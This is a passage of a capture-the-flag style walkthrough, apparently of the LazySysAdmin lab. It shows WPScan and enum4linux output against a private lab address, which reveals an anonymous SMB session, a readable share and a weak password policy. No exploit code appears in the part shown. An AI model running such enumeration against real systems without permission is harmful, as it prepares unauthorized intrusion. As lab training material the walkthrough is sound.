role="presentation"><span role="presentation" style="padding-right: 0.1px;">        \ \        / /  __ \ / ____|                 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">          \ \/  \/ / |  ___/ \___ 
\ / __|/ _` | '_ \ </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">           \  /\  /  | |     ____) | (__| (_| | | | |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">            \/  \/   |_|    |_____/ \___|\__,_|_| |_|</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">        WordPress Security Scanner by the WPScan Team </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">                       Version 2.9.3</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">          Sponsored by Sucuri - https://sucuri.net</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">_______________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] URL: http://192.168.0.100/wordpress/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Started: Thu Feb  1 01:37:20 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre 
class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] The WordPress 'http://192.168.0.100/wordpress/readme.html' file exists exposing a version number</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: LINK: <http://192.168.0.100/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Registration is enabled: http://192.168.0.100/wordpress/wp-login.php?action=register</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] XML-RPC Interface available under: http://192.168.0.100/wordpress/xmlrpc.php</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Upload directory has directory listing enabled: http://192.168.0.100/wordpress/wp-content/uploads/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] 
Includes directory has directory listing enabled: http://192.168.0.100/wordpress/wp-includes/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] WordPress version 4.8.5 (Released on 2018-01-16) identified from meta generator, links opml</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] WordPress theme in use: twentyfifteen - v1.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Name: twentyfifteen - v1.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Last updated: 2017-11-16T00:00:00.000Z</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Location: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Readme: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/readme.txt</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] 
The version is out of date, the latest version is 1.9</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Style URL: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/style.css</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Theme Name: Twenty Fifteen</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Theme URI: https://wordpress.org/themes/twentyfifteen/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Author: the WordPress team</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Author URI: https://wordpress.org/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Enumerating plugins from passive detection ...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] No plugins found</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Finished: Thu Feb  1 01:37:24 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;">[+] Requests Done: 356</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Memory used: 37.98 MB</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Elapsed time: 00:00:04</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 1273px;"></div><div class="CodeMirror-gutters" style="display: none; height: 1303px;"></div></div></div></pre><p> </p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/6.png' alt='6' referrerPolicy='no-referrer' /></p><p>enum4linux 192.168.0.100</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span 
role="presentation" style="padding-right: 0.1px;">Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb  <span class="cm-number">1</span> <span class="cm-number">00</span>:46:08 <span class="cm-number">2018</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Target Information    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Target ........... <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">RID Range ........ <span class="cm-number">500</span><span class="cm-attribute">-550</span>,1000-1050</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Username ......... <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Password ......... <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Known Usernames .. 
administrator, guest, krbtgt, domain admins, root, bin, none</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Enumerating Workgroup/Domain on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got domain/workgroup name: WORKGROUP</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Nbtstat Information <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=============================================</span> </span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;">Looking up status of <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>LAZYSYSADMIN    <00> <span class="cm-attribute">-</span>         B <ACTIVE>  Workstation Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>LAZYSYSADMIN    <03> <span class="cm-attribute">-</span>         B <ACTIVE>  Messenger Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>LAZYSYSADMIN    <20> <span class="cm-attribute">-</span>         B <ACTIVE>  File Server Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>WORKGROUP       <00> <span class="cm-attribute">-</span> <GROUP> B <ACTIVE>  Domain/Workgroup Name</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>WORKGROUP       <1e> <span class="cm-attribute">-</span> <GROUP> B <ACTIVE>  Browser Service Elections</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>MAC Address <span class="cm-operator">=</span> <span class="cm-number">00</span><span 
class="cm-attribute">-00-00-00-00-00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Session Check on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Server <span class="cm-number">192</span>.168.0.100 allows sessions using username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Getting domain SID <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Domain Name: 
WORKGROUP</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Domain Sid: (NULL SID)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Can<span class="cm-string">'t determine if host is part of domain or part of a workgroup</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    OS information on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got OS info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 from smbclient: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got OS info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 from srvinfo:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>LAZYSYSADMIN   Wk Sv PrQ Unx NT SNT Web server</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 
0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>platform_id     :<span class="cm-tab" role="presentation" cm-text="  ">   </span><span class="cm-number">500</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>os version      :<span class="cm-tab" role="presentation" cm-text="  ">   </span><span class="cm-number">6</span>.1</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>server type     :<span class="cm-tab" role="presentation" cm-text="  ">   </span>0x809a03</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Users on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================================</span> </span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Share Enumeration on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">WARNING: The <span class="cm-string">"syslog"</span> option is deprecated</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>Sharename       Type      Comment</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-attribute">---------</span>       <span class="cm-attribute">----</span>      <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>print<span class="cm-def">$ </span>         Disk      Printer Drivers</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>share<span class="cm-def">$ </span>         Disk      Sumshare</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>IPC<span class="cm-def">$ </span>           IPC       IPC Service (Web 
server)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Reconnecting with SMB1 <span class="cm-keyword">for</span> workgroup listing.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>Server               Comment</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span><span class="cm-attribute">---------</span>            <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>Workgroup            Master</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span><span class="cm-attribute">---------</span>            <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>WORKGROUP            </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Attempting 
to map shares on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/print<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="   ">  </span>Mapping</span>: DENIED, Listing: N/A</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/share<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="    ">  </span>Mapping</span>: OK, Listing: OK</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/IPC<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="   ">    </span></span>[E] Can<span class="cm-string">'t understand response:</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">WARNING: The <span class="cm-string">"syslog"</span> option is deprecated</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Password Policy Information <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span 
class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Attaching to <span class="cm-number">192</span>.168.0.100 using a NULL share</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Trying protocol <span class="cm-number">445</span>/SMB...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Found domain(s):</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] LAZYSYSADMIN</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>[<span class="cm-operator">+</span>] Builtin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Password Info <span class="cm-keyword">for</span> Domain: LAZYSYSADMIN</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>[<span class="cm-operator">+</span>] Minimum password length: <span class="cm-number">5</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Password history length: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Maximum password age: Not Set</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Password Complexity Flags: <span class="cm-number">000000</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Refuse Password Change: <span 
class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Store Cleartext: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Lockout Admins: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password No Clear Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password No Anon Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Complex: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span 
role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] Minimum password age: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] Reset Account Lockout Counter: <span class="cm-number">30</span> minutes </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Locked Account Duration: <span class="cm-number">30</span> minutes </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Account Lockout Threshold: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Forced Log off Time: Not Set</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Retieved partial password policy with rpcclient:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;">Password Complexity: Disabled</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Minimum Password Length: <span class="cm-number">5</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">===============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Groups on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">===============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting builtin groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 